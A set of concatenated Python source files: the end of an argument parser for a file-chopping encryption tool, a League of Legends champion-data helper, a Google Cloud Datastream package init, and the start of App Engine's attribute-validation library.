parser.set_defaults(passwordfile=None, keyfile=None, kp_file=None)
parser.set_defaults(use_pw=False, use_key=False)
subparsers = parser.add_subparsers(
dest='command', metavar='(chop | merge | derive | gen)',
help='see docs/usage for more information')
chop_aliases = ['chp', 'c']
merge_aliases = ['mrg', 'm']
derive_aliases = ['der', 'd']
gen_aliases = ['gen', 'g']
cmds = ('chop', 'merge', 'derive', 'generate')
cmd_alias = (chop_aliases, merge_aliases, derive_aliases, gen_aliases)
cmd_map = dict(zip(cmds, cmd_alias))
chp = subparsers.add_parser('chop', aliases=chop_aliases)
mrg = subparsers.add_parser('merge', aliases=merge_aliases)
derkey = subparsers.add_parser('derive', aliases=derive_aliases)
gen_util = subparsers.add_parser('generate', aliases=gen_aliases)
# --------------------------------------------------------------------------
chop_grp = chp.add_argument_group('Chop')
chop_grp.add_argument(
'input', nargs='+', type=argparse.FileType('rb'), metavar='infile',
help='input file(s) to chop and encrypt')
chop_grp.add_argument(
'-n', type=int, default=10, dest='partitions', metavar='n',
help='create n partitions from each input file - default: 10')
chop_grp.add_argument(
'-w', '--wobble', type=int, default=0, metavar='n', choices=range(1, 100),
help='randomize partition size (1-99)')
chop_grp.add_argument(
'-r', '--randfn', action='store_true',
help='use random file names for partitions instead of sequential numeric')
load_keypass_options(chp, pfx='en')
# --------------------------------------------------------------------------
mrg_grp = mrg.add_argument_group('Merge')
mrg_grp.add_argument(
'input', nargs='+', type=argparse.FileType('rb'), metavar='infile',
help='input files to decrypt and merge')
load_keypass_options(mrg, pfx='de')
# --------------------------------------------------------------------------
load_pw_options(derkey, pw_only=True)
# --------------------------------------------------------------------------
gen_grp = gen_util.add_argument_group('Utilities')
gen_grp.add_argument(
'-k', '--key', action='store_true', dest='genkey',
help='write file containing randomly generated base64 encoded 32 byte key')
gen_grp.add_argument(
'-p', '--pw', type=int, default=0, metavar='n', dest='genpw',
help='write file containing randomly generated password of n characters')
gen_grp.add_argument(
'-s', '--salt', type=int, default=0, metavar='n', dest='gensalt',
help='write file containing randomly generated salt of n bytes - Standard: 32')
gen_grp.add_argument(
'-r', '--repeat', type=int, default=1, metavar='n',
help='generate n files per command')
# --------------------------------------------------------------------------
for grp in (chp, mrg, derkey, gen_util):
grp.add_argument(
'-o', '--outdir', type=validate_directory, default=os.getcwd(),
metavar='dir', help='output directory')
grp.add_argument(
'-q', '--quiet', action='store_true',
help='disable all console text output')
parser.add_argument('-v', '--version', action='version', version=VERSION)
args = parser.parse_args()
if args.command not in cmd_map:
for k, v in cmd_map.items():
if args.command in v:
args.command = k
break
if args.command != 'generate':
if args.use_key:
if not args.kp_file:
args.kw = getpass.getpass(prompt='Key: ')
else:
args.keyfile = args.kp_file
elif args.use_pw or args.command == 'derive':
args.use_pw = True
if not args.salt:
print('>>> salt file required for password use')
sys.exit(0)
if not args.kp_file:
args.pw = getpass.getpass(prompt='Password: ')
else:
args.passwordfile = args.kp_file
return args
# ------------------------------------------------------------------------------
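# Illustrative invocations (assumed; the file names below are placeholders, not part of the project):
#   choppy chop secret.pdf -n 16 --use-pw -s salt.bin
#   choppy merge part_* --use-key -i key.txt -o restored/
#   choppy generate --key --salt 32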
if __name__ == '__main__':
args = parse_arguments()
print('\n')
for k, v in vars(args).items():
print(k, ':', v)
print('\n')
|
py | 1a49f0d489c8d87d271181595104d8f2721804e0 | import json
from utils import dict_manip as dm
def get_champ_id(champ_data: dict, champ: str):
"""
note:
must use get_riot_champ_name to pass `champ`
if the name formatting is in question.
i.e. vel'koz is formatted to velkoz and lee sin is leesin in riot's eyes.
"""
return champ_data['data'][champ]['id']
def get_fancy_champ_name(champ_data: dict, champ: str):
return champ_data['data'][champ]['name']
def get_riot_champ_name(champ_data: dict, champ: str):
if champ in champ_data['data']:
return champ
return dm.get_closest(champ_data['data'], champ)
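# Example flow (hypothetical data; resolving "lee sin" -> "leesin" relies on dm.get_closest,
# per the docstring above):
#   riot_name = get_riot_champ_name(champ_data, "lee sin")
#   champ_id = get_champ_id(champ_data, riot_name)
#   pretty = get_fancy_champ_name(champ_data, riot_name)   # e.g. "Lee Sin"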
def get_champ_title(champ_data: dict, champ: str):
return champ_data['data'][champ]['title']
def get_summoner_icon(summoner: str, region: str = 'na'):
return f'https://avatar.leagueoflegends.com/{region}/{summoner}.png'
def get_summoner_id(summoner_name):
pass
|
py | 1a49f1c7329afa0c043f2098a620aa2c50d83c50 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.cloud.datastream_v1alpha1.services.datastream.client import DatastreamClient
from google.cloud.datastream_v1alpha1.services.datastream.async_client import (
DatastreamAsyncClient,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
CreateConnectionProfileRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
CreatePrivateConnectionRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import CreateRouteRequest
from google.cloud.datastream_v1alpha1.types.datastream import CreateStreamRequest
from google.cloud.datastream_v1alpha1.types.datastream import (
DeleteConnectionProfileRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
DeletePrivateConnectionRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import DeleteRouteRequest
from google.cloud.datastream_v1alpha1.types.datastream import DeleteStreamRequest
from google.cloud.datastream_v1alpha1.types.datastream import (
DiscoverConnectionProfileRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
DiscoverConnectionProfileResponse,
)
from google.cloud.datastream_v1alpha1.types.datastream import FetchErrorsRequest
from google.cloud.datastream_v1alpha1.types.datastream import FetchErrorsResponse
from google.cloud.datastream_v1alpha1.types.datastream import FetchStaticIpsRequest
from google.cloud.datastream_v1alpha1.types.datastream import FetchStaticIpsResponse
from google.cloud.datastream_v1alpha1.types.datastream import (
GetConnectionProfileRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
GetPrivateConnectionRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import GetRouteRequest
from google.cloud.datastream_v1alpha1.types.datastream import GetStreamRequest
from google.cloud.datastream_v1alpha1.types.datastream import (
ListConnectionProfilesRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
ListConnectionProfilesResponse,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
ListPrivateConnectionsRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
ListPrivateConnectionsResponse,
)
from google.cloud.datastream_v1alpha1.types.datastream import ListRoutesRequest
from google.cloud.datastream_v1alpha1.types.datastream import ListRoutesResponse
from google.cloud.datastream_v1alpha1.types.datastream import ListStreamsRequest
from google.cloud.datastream_v1alpha1.types.datastream import ListStreamsResponse
from google.cloud.datastream_v1alpha1.types.datastream import OperationMetadata
from google.cloud.datastream_v1alpha1.types.datastream import (
UpdateConnectionProfileRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import UpdateStreamRequest
from google.cloud.datastream_v1alpha1.types.datastream_resources import AvroFileFormat
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
ConnectionProfile,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
DestinationConfig,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import Error
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
ForwardSshTunnelConnectivity,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
GcsDestinationConfig,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import GcsProfile
from google.cloud.datastream_v1alpha1.types.datastream_resources import JsonFileFormat
from google.cloud.datastream_v1alpha1.types.datastream_resources import MysqlColumn
from google.cloud.datastream_v1alpha1.types.datastream_resources import MysqlDatabase
from google.cloud.datastream_v1alpha1.types.datastream_resources import MysqlProfile
from google.cloud.datastream_v1alpha1.types.datastream_resources import MysqlRdbms
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
MysqlSourceConfig,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import MysqlSslConfig
from google.cloud.datastream_v1alpha1.types.datastream_resources import MysqlTable
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
NoConnectivitySettings,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import OracleColumn
from google.cloud.datastream_v1alpha1.types.datastream_resources import OracleProfile
from google.cloud.datastream_v1alpha1.types.datastream_resources import OracleRdbms
from google.cloud.datastream_v1alpha1.types.datastream_resources import OracleSchema
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
OracleSourceConfig,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import OracleTable
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
PrivateConnection,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
PrivateConnectivity,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import Route
from google.cloud.datastream_v1alpha1.types.datastream_resources import SourceConfig
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
StaticServiceIpConnectivity,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import Stream
from google.cloud.datastream_v1alpha1.types.datastream_resources import Validation
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
ValidationMessage,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import ValidationResult
from google.cloud.datastream_v1alpha1.types.datastream_resources import VpcPeeringConfig
from google.cloud.datastream_v1alpha1.types.datastream_resources import GcsFileFormat
from google.cloud.datastream_v1alpha1.types.datastream_resources import SchemaFileFormat
__all__ = (
"DatastreamClient",
"DatastreamAsyncClient",
"CreateConnectionProfileRequest",
"CreatePrivateConnectionRequest",
"CreateRouteRequest",
"CreateStreamRequest",
"DeleteConnectionProfileRequest",
"DeletePrivateConnectionRequest",
"DeleteRouteRequest",
"DeleteStreamRequest",
"DiscoverConnectionProfileRequest",
"DiscoverConnectionProfileResponse",
"FetchErrorsRequest",
"FetchErrorsResponse",
"FetchStaticIpsRequest",
"FetchStaticIpsResponse",
"GetConnectionProfileRequest",
"GetPrivateConnectionRequest",
"GetRouteRequest",
"GetStreamRequest",
"ListConnectionProfilesRequest",
"ListConnectionProfilesResponse",
"ListPrivateConnectionsRequest",
"ListPrivateConnectionsResponse",
"ListRoutesRequest",
"ListRoutesResponse",
"ListStreamsRequest",
"ListStreamsResponse",
"OperationMetadata",
"UpdateConnectionProfileRequest",
"UpdateStreamRequest",
"AvroFileFormat",
"ConnectionProfile",
"DestinationConfig",
"Error",
"ForwardSshTunnelConnectivity",
"GcsDestinationConfig",
"GcsProfile",
"JsonFileFormat",
"MysqlColumn",
"MysqlDatabase",
"MysqlProfile",
"MysqlRdbms",
"MysqlSourceConfig",
"MysqlSslConfig",
"MysqlTable",
"NoConnectivitySettings",
"OracleColumn",
"OracleProfile",
"OracleRdbms",
"OracleSchema",
"OracleSourceConfig",
"OracleTable",
"PrivateConnection",
"PrivateConnectivity",
"Route",
"SourceConfig",
"StaticServiceIpConnectivity",
"Stream",
"Validation",
"ValidationMessage",
"ValidationResult",
"VpcPeeringConfig",
"GcsFileFormat",
"SchemaFileFormat",
)
|
py | 1a49f1e8558cd09655641156b082406181ef3852 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Validation tools for generic object structures.
This library is used for defining classes with constrained attributes.
Attributes are defined on the class which contains them using validators.
Although validators can be defined by any client of this library, a number
of standard validators are provided here.
Validators can be any callable that takes a single parameter which checks
the new value before it is assigned to the attribute. Validators are
permitted to modify a received value so that it is appropriate for the
attribute definition. For example, using int as a validator will cast
a correctly formatted string to a number, or raise an exception if it
cannot. This is not recommended, however. The correct way to use a
validator that ensures the correct type is to use the Type validator.
This validation library is mainly intended for use with the YAML object
builder. See yaml_object.py.
"""
import re
import google
import yaml
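# A minimal usage sketch (illustrative only; the Person class below is an
# assumption, not part of this module):
#
#   class Person(Validated):
#     ATTRIBUTES = {'name': Type(str),
#                   'age': Optional(Type(int))}
#
#   p = Person(name='Ada')
#   p.CheckInitialized()  # passes; 'age' is optional and defaults to None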
class Error(Exception):
"""Base class for all package errors."""
class AttributeDefinitionError(Error):
"""An error occurred in the definition of class attributes."""
class ValidationError(Error):
"""Base class for raising exceptions during validation."""
def __init__(self, message, cause=None):
"""Initialize exception."""
if hasattr(cause, 'args') and cause.args:
Error.__init__(self, message, *cause.args)
else:
Error.__init__(self, message)
self.message = message
self.cause = cause
def __str__(self):
return str(self.message)
class MissingAttribute(ValidationError):
"""Raised when a required attribute is missing from object."""
def AsValidator(validator):
"""Wrap various types as instances of a validator.
Used to allow shorthand for common validator types. It
converts the following types to the following Validators.
strings -> Regex
type -> Type
collection -> Options
Validator -> Its self!
Args:
validator: Object to wrap in a validator.
Returns:
Validator instance that wraps the given value.
Raises:
AttributeDefinitionError: if validator is not one of the above described
types.
"""
if isinstance(validator, (str, unicode)):
return Regex(validator, type(validator))
if isinstance(validator, type):
return Type(validator)
if isinstance(validator, (list, tuple, set)):
return Options(*tuple(validator))
if isinstance(validator, Validator):
return validator
else:
raise AttributeDefinitionError('%s is not a valid validator' %
str(validator))
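# Shorthand equivalences implemented above (illustrative):
#   AsValidator('[a-z]+')        -> Regex('[a-z]+', str)
#   AsValidator(int)             -> Type(int)
#   AsValidator(['low', 'high']) -> Options('low', 'high')
#   AsValidator(Type(bool))      -> the same Type(bool) instance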
def _SimplifiedValue(validator, value):
"""Convert any value to simplified collections and basic types.
Args:
validator: An instance of Validator that corresponds with 'value'.
May also be 'str' or 'int' if those were used instead of a full
Validator.
value: Value to convert to simplified collections.
Returns:
The value as a dictionary if it is a ValidatedBase object. A list of
items converted to simplified collections if value is a list
or a tuple. Otherwise, just the value.
"""
if isinstance(value, ValidatedBase):
return value.ToDict()
elif isinstance(value, (list, tuple)):
return [_SimplifiedValue(validator, item) for item in value]
elif isinstance(validator, Validator):
return validator.ToValue(value)
return value
class ValidatedBase(object):
"""Base class for all validated objects."""
@classmethod
def GetValidator(self, key):
"""Safely get the Validator corresponding to the given key.
This function should be overridden by subclasses
Args:
key: The attribute or item to get a validator for.
Returns:
Validator associated with key or attribute.
Raises:
ValidationError: if the requested key is illegal.
"""
raise NotImplementedError('Subclasses of ValidatedBase must '
'override GetValidator.')
def SetMultiple(self, attributes):
"""Set multiple values on Validated instance.
All attributes will be validated before being set.
Args:
attributes: A dict of attributes/items to set.
Raises:
ValidationError: when no validated attribute exists on class.
"""
for key, value in attributes.iteritems():
self.Set(key, value)
def Set(self, key, value):
"""Set a single value on Validated instance.
This method should be overridden by sub-classes.
This method can only be used to assign validated attributes/items.
Args:
key: The name of the attribute
value: The value to set
Raises:
ValidationError: when no validated attribute exists on class.
"""
raise NotImplementedError('Subclasses of ValidatedBase must override Set.')
def CheckInitialized(self):
"""Checks that all required fields are initialized.
This function is called after all attributes have been checked to
verify any higher level constraints, for example ensuring all required
attributes are present.
Subclasses should override this function and raise an exception for
any errors.
"""
pass
def ToDict(self):
"""Convert ValidatedBase object to a dictionary.
Recursively traverses all of its elements and converts everything to
simplified collections.
Subclasses should override this method.
Returns:
A dictionary mapping all attributes to simple values or collections.
"""
raise NotImplementedError('Subclasses of ValidatedBase must '
'override ToDict.')
def ToYAML(self):
"""Print validated object as simplified YAML.
Returns:
Object as a simplified YAML string compatible with parsing using the
SafeLoader.
"""
return yaml.dump(self.ToDict(),
default_flow_style=False,
Dumper=yaml.SafeDumper)
class Validated(ValidatedBase):
"""Base class for classes that require validation.
A class which intends to use validated fields should sub-class itself from
this class. Each class should define an 'ATTRIBUTES' class variable which
should be a map from attribute name to its validator. For example:
class Story(Validated):
ATTRIBUTES = {'title': Type(str),
'authors': Repeated(Type(str)),
'isbn': Optional(Type(str)),
'pages': Type(int),
}
Attributes that are not listed under ATTRIBUTES work like normal and are
not validated upon assignment.
"""
ATTRIBUTES = None
def __init__(self, **attributes):
"""Constructor for Validated classes.
This constructor can optionally assign values to the class via its
keyword arguments.
Raises:
AttributeDefinitionError: when class instance is missing ATTRIBUTE
definition or when ATTRIBUTE is of the wrong type.
"""
if not isinstance(self.ATTRIBUTES, dict):
raise AttributeDefinitionError(
'The class %s does not define an ATTRIBUTE variable.'
% self.__class__)
for key in self.ATTRIBUTES.keys():
object.__setattr__(self, key, self.GetValidator(key).default)
self.SetMultiple(attributes)
@classmethod
def GetValidator(self, key):
"""Safely get the underlying attribute definition as a Validator.
Args:
key: Name of attribute to get.
Returns:
Validator associated with key or attribute value wrapped in a
validator.
"""
if key not in self.ATTRIBUTES:
raise ValidationError(
'Unexpected attribute \'%s\' for object of type %s.' %
(key, self.__name__))
return AsValidator(self.ATTRIBUTES[key])
def Set(self, key, value):
"""Set a single value on Validated instance.
This method can only be used to assign validated attributes.
Args:
key: The name of the attribute
value: The value to set
Raises:
ValidationError when no validated attribute exists on class.
"""
setattr(self, key, value)
def Get(self, key):
"""Get a single value on Validated instance.
This method can only be used to retrieve validated attributes.
Args:
key: The name of the attribute
Raises:
ValidationError when no validated attribute exists on class.
"""
self.GetValidator(key)
return getattr(self, key)
def CheckInitialized(self):
"""Checks that all required fields are initialized.
Since an instance of Validated starts off in an uninitialized state, it
is sometimes necessary to check that it has been fully initialized.
The main problem this solves is how to validate that an instance has
all of its required fields set. By default, Validator classes do not
allow None, but all attributes are initialized to None when instantiated.
Raises:
Exception relevant to the kind of validation. The type of the exception
is determined by the validator. Typically this will be ValueError or
TypeError.
"""
for key in self.ATTRIBUTES.iterkeys():
try:
self.GetValidator(key)(getattr(self, key))
except MissingAttribute, e:
e.message = "Missing required value '%s'." % key
raise e
def __setattr__(self, key, value):
"""Set attribute.
Setting a value on an object of this type will only work for attributes
defined in ATTRIBUTES. To make other assignments possible it is necessary
to override this method in subclasses.
It is important that assignment is restricted in this way because
this validation is used as validation for parsing. Absent this restriction
it would be possible for method names to be overwritten.
Args:
key: Name of attribute to set.
value: Attributes new value.
Raises:
ValidationError: when trying to assign to an attribute
that does not exist.
"""
value = self.GetValidator(key)(value, key)
object.__setattr__(self, key, value)
def __str__(self):
"""Formatted view of validated object and nested values."""
return repr(self)
def __repr__(self):
"""Formatted view of validated object and nested values."""
values = [(attr, getattr(self, attr)) for attr in self.ATTRIBUTES]
dent = ' '
value_list = []
for attr, value in values:
value_list.append('\n%s%s=%s' % (dent, attr, value))
return "<%s %s\n%s>" % (self.__class__.__name__, ' '.join(value_list), dent)
def __eq__(self, other):
"""Equality operator.
Comparison is done by comparing all attribute values to those in the other
instance. Objects which are not of the same type are not equal.
Args:
other: Other object to compare against.
Returns:
True if validated objects are equal, else False.
"""
if type(self) != type(other):
return False
for key in self.ATTRIBUTES.iterkeys():
if getattr(self, key) != getattr(other, key):
return False
return True
def __ne__(self, other):
"""Inequality operator."""
return not self.__eq__(other)
def __hash__(self):
"""Hash function for using Validated objects in sets and maps.
Hash is done by hashing all keys and values and xor'ing them together.
Returns:
Hash of validated object.
"""
result = 0
for key in self.ATTRIBUTES.iterkeys():
value = getattr(self, key)
if isinstance(value, list):
value = tuple(value)
result = result ^ hash(key) ^ hash(value)
return result
def ToDict(self):
"""Convert Validated object to a dictionary.
Recursively traverses all of its elements and converts everything to
simplified collections.
Returns:
A dict of all attributes defined in this classes ATTRIBUTES mapped
to its value. This structure is recursive in that Validated objects
that are referenced by this object and in lists are also converted to
dicts.
"""
result = {}
for name, validator in self.ATTRIBUTES.iteritems():
value = getattr(self, name)
if not(isinstance(validator, Validator) and value == validator.default):
result[name] = _SimplifiedValue(validator, value)
return result
class ValidatedDict(ValidatedBase, dict):
"""Base class for validated dictionaries.
You can control the keys and values that are allowed in the dictionary
by setting KEY_VALIDATOR and VALUE_VALIDATOR to subclasses of Validator (or
things that can be interpreted as validators, see AsValidator).
For example if you wanted only capitalized keys that map to integers
you could do:
class CapitalizedIntegerDict(ValidatedDict):
KEY_VALIDATOR = Regex('[A-Z].*')
VALUE_VALIDATOR = int # this gets interpreted to Type(int)
The following code would result in an error:
my_dict = CapitalizedIntegerDict()
my_dict['lowercase'] = 5 # Throws a validation exception
You can freely nest Validated and ValidatedDict inside each other so:
class MasterObject(Validated):
ATTRIBUTES = {'paramdict': CapitalizedIntegerDict}
Could be used to parse the following yaml:
paramdict:
ArbitraryKey: 323
AnotherArbitraryKey: 9931
"""
KEY_VALIDATOR = None
VALUE_VALIDATOR = None
def __init__(self, **kwds):
"""Construct a validated dict by interpreting the key and value validators.
Args:
**kwds: keyword arguments will be validated and put into the dict.
"""
self.update(kwds)
@classmethod
def GetValidator(self, key):
"""Check the key for validity and return a corresponding value validator.
Args:
key: The key that will correspond to the validator we are returning.
"""
key = AsValidator(self.KEY_VALIDATOR)(key, 'key in %s' % self.__name__)
return AsValidator(self.VALUE_VALIDATOR)
def __setitem__(self, key, value):
"""Set an item.
Only attributes accepted by GetValidator and values that validate
with the validator returned from GetValidator are allowed to be set
in this dictionary.
Args:
key: Name of item to set.
value: Items new value.
Raises:
ValidationError: when trying to assign to a value that does not exist.
"""
dict.__setitem__(self, key, self.GetValidator(key)(value, key))
def setdefault(self, key, value=None):
"""Trap setdefaults to ensure all key/value pairs are valid.
See the documentation for setdefault on dict for usage details.
Raises:
ValidationError: if the specified key is illegal or the
value invalid.
"""
return dict.setdefault(self, key, self.GetValidator(key)(value, key))
def update(self, other, **kwds):
"""Trap updates to ensure all key/value pairs are valid.
See the documentation for update on dict for usage details.
Raises:
ValidationError: if any of the specified keys are illegal or
values invalid.
"""
if hasattr(other, 'keys') and callable(getattr(other, 'keys')):
newother = {}
for k in other:
newother[k] = self.GetValidator(k)(other[k], k)
else:
newother = [(k, self.GetValidator(k)(v, k)) for (k, v) in other]
newkwds = {}
for k in kwds:
newkwds[k] = self.GetValidator(k)(kwds[k], k)
dict.update(self, newother, **newkwds)
def Set(self, key, value):
"""Set a single value on Validated instance.
This method checks that a given key and value are valid and if so
puts the item into this dictionary.
Args:
key: The name of the attribute
value: The value to set
Raises:
ValidationError: when no validated attribute exists on class.
"""
self[key] = value
def ToDict(self):
"""Convert ValidatedBase object to a dictionary.
Recursively traverses all of its elements and converts everything to
simplified collections.
Subclasses should override this method.
Returns:
A dictionary mapping all attributes to simple values or collections.
"""
result = {}
for name, value in self.iteritems():
validator = self.GetValidator(name)
result[name] = _SimplifiedValue(validator, value)
return result
class Validator(object):
"""Validator base class.
Though any callable can be used as a validator, this class encapsulates the
case when a specific validator needs to hold a particular state or
configuration.
To implement Validator sub-class, override the validate method.
This class is permitted to change the ultimate value that is set to the
attribute if there is a reasonable way to perform the conversion.
"""
expected_type = object
def __init__(self, default=None):
"""Constructor.
Args:
default: Default assignment is made during initialization and will
not pass through validation.
"""
self.default = default
def __call__(self, value, key='???'):
"""Main interface to validator is call mechanism."""
return self.Validate(value, key)
def Validate(self, value, key='???'):
"""Override this method to customize sub-class behavior.
Args:
value: Value to validate.
key: Name of the field being validated.
Returns:
Value if value is valid, or a valid representation of value.
"""
return value
def ToValue(self, value):
"""Convert 'value' to a simplified collection or basic type.
Subclasses of Validator should override this method when the dumped
representation of 'value' is not simply <type>(value) (e.g. a regex).
Args:
value: An object of the same type that was returned from Validate().
Returns:
An instance of a builtin type (e.g. int, str, dict, etc). By default
it returns 'value' unmodified.
"""
return value
class Type(Validator):
"""Verifies property is of expected type.
Can optionally convert value if it is not of the expected type.
It is possible to specify a required field of a specific type in shorthand
by merely providing the type. This method is slightly less efficient than
providing an explicit type but is not significant unless parsing a large
amount of information:
class Person(Validated):
ATTRIBUTES = {'name': unicode,
'age': int,
}
However, in most instances it is best to use the type constants:
class Person(Validated):
ATTRIBUTES = {'name': TypeUnicode,
'age': TypeInt,
}
"""
def __init__(self, expected_type, convert=True, default=None):
"""Initialize Type validator.
Args:
expected_type: Type that attribute should validate against.
convert: Cause conversion if value is not the right type.
Conversion is done by calling the constructor of the type
with the value as its first parameter.
default: Default assignment is made during initialization and will
not pass through validation.
"""
super(Type, self).__init__(default)
self.expected_type = expected_type
self.convert = convert
def Validate(self, value, key):
"""Validate that value has the correct type.
Args:
value: Value to validate.
key: Name of the field being validated.
Returns:
value if value is of the correct type. value is converted to the correct
type if the Validator is configured to do so.
Raises:
MissingAttribute: if value is None and the expected type is not NoneType.
ValidationError: if value is not of the right type and the validator
is either configured not to convert or cannot convert.
"""
if not isinstance(value, self.expected_type):
if value is None:
raise MissingAttribute('Missing value is required.')
if self.convert:
try:
return self.expected_type(value)
except ValueError, e:
raise ValidationError(
'Value %r for %s could not be converted to type %s.' % (
value, key, self.expected_type.__name__), e)
except TypeError, e:
raise ValidationError(
'Value %r for %s is not of the expected type %s' % (
value, key, self.expected_type.__name__), e)
else:
raise ValidationError(
'Value %r for %s is not of the expected type %s' % (
value, key, self.expected_type.__name__))
else:
return value
TYPE_BOOL = Type(bool)
TYPE_INT = Type(int)
TYPE_LONG = Type(long)
TYPE_STR = Type(str)
TYPE_UNICODE = Type(unicode)
TYPE_FLOAT = Type(float)
class Options(Validator):
"""Limit field based on pre-determined values.
Options are used to make sure an enumerated set of values are the only
one permitted for assignment. It is possible to define aliases which
map multiple string values to a single original. An example of usage:
class ZooAnimal(validated.Class):
ATTRIBUTES = {
'name': str,
'kind': Options('platypus', # No aliases
('rhinoceros', ['rhino']), # One alias
('canine', ('dog', 'puppy')), # Two aliases
)
"""
def __init__(self, *options, **kw):
"""Initialize options.
Args:
options: List of allowed values.
"""
if 'default' in kw:
default = kw['default']
else:
default = None
alias_map = {}
def AddAlias(alias, original):
"""Set new alias on alias_map.
Raises:
AttributeDefinitionError: when option already exists or if alias is
not of type str.
"""
if not isinstance(alias, str):
raise AttributeDefinitionError(
'All option values must be of type str.')
elif alias in alias_map:
raise AttributeDefinitionError(
"Option '%s' already defined for options property." % alias)
alias_map[alias] = original
for option in options:
if isinstance(option, str):
AddAlias(option, option)
elif isinstance(option, (list, tuple)):
if len(option) != 2:
raise AttributeDefinitionError("Alias is defined as a list of tuple "
"with two items. The first is the "
"original option, while the second "
"is a list or tuple of str aliases.\n"
"\n Example:\n"
" ('original', ('alias1', "
"'alias2'")
original, aliases = option
AddAlias(original, original)
if not isinstance(aliases, (list, tuple)):
raise AttributeDefinitionError('Alias lists must be a list or tuple')
for alias in aliases:
AddAlias(alias, original)
else:
raise AttributeDefinitionError("All options must be of type str "
"or of the form (str, [str...]).")
super(Options, self).__init__(default)
self.options = alias_map
def Validate(self, value, key):
"""Validate options.
Returns:
Original value for provided alias.
Raises:
ValidationError: when value is not one of predefined values.
"""
if value is None:
raise ValidationError('Value for options field must not be None.')
value = str(value)
if value not in self.options:
raise ValidationError('Value \'%s\' for %s not in %s.'
% (value, key, self.options))
return self.options[value]
class Optional(Validator):
"""Definition of optional attributes.
Optional values are attributes which can be set to None or left
unset. All values in a basic Validated class are set to None
at initialization. Failure to assign to non-optional values
will result in a validation error when calling CheckInitialized.
"""
def __init__(self, validator, default=None):
"""Initializer.
This constructor will make a few guesses about the value passed in
as the validator:
- If the validator argument is a type, it automatically creates a Type
validator around it.
- If the validator argument is a list or tuple, it automatically
creates an Options validator around it.
Args:
validator: Optional validation condition.
Raises:
AttributeDefinitionError: if validator is not callable.
"""
self.validator = AsValidator(validator)
self.expected_type = self.validator.expected_type
self.default = default
def Validate(self, value, key):
"""Optionally require a value.
Normal validators do not accept None. This will accept none on
behalf of the contained validator.
Args:
value: Value to be validated as optional.
key: Name of the field being validated.
Returns:
None if value is None, else results of contained validation.
"""
if value is None:
return None
return self.validator(value, key)
def ToValue(self, value):
"""Convert 'value' to a simplified collection or basic type."""
if value is None:
return None
return self.validator.ToValue(value)
class Regex(Validator):
"""Regular expression validator.
Regular expression validator always converts value to string. Note that
matches must be exact. Partial matches will not validate. For example:
class ClassDescr(Validated):
ATTRIBUTES = { 'name': Regex(r'[a-zA-Z_][a-zA-Z_0-9]*'),
'parent': Type(type),
}
Alternatively, any attribute that is defined as a string is automatically
interpreted to be of type Regex. It is possible to specify unicode regex
strings as well. This approach is slightly less efficient, but usually
is not significant unless parsing large amounts of data:
class ClassDescr(Validated):
ATTRIBUTES = { 'name': r'[a-zA-Z_][a-zA-Z_0-9]*',
'parent': Type(type),
}
# This will raise a ValidationError exception.
my_class(name='AName with space', parent=AnotherClass)
"""
def __init__(self, regex, string_type=unicode, default=None):
"""Initialized regex validator.
Args:
regex: Regular expression string to use for comparison.
Raises:
AttributeDefinitionError: if string_type is not a kind of string.
"""
super(Regex, self).__init__(default)
if (not issubclass(string_type, basestring) or
string_type is basestring):
raise AttributeDefinitionError(
'Regex fields must be a string type not %s.' % str(string_type))
if isinstance(regex, basestring):
self.re = re.compile('^(?:%s)$' % regex)
else:
raise AttributeDefinitionError(
'Regular expression must be string. Found %s.' % str(regex))
self.expected_type = string_type
def Validate(self, value, key):
"""Does validation of a string against a regular expression.
Args:
value: String to match against regular expression.
key: Name of the field being validated.
Raises:
ValidationError: when value does not match regular expression or
when value does not match provided string type.
"""
if issubclass(self.expected_type, str):
cast_value = TYPE_STR(value)
else:
cast_value = TYPE_UNICODE(value)
if self.re.match(cast_value) is None:
raise ValidationError('Value \'%s\' for %s does not match expression '
'\'%s\'' % (value, key, self.re.pattern))
return cast_value
class _RegexStrValue(object):
"""Simulates the regex object to support recompilation when necessary.
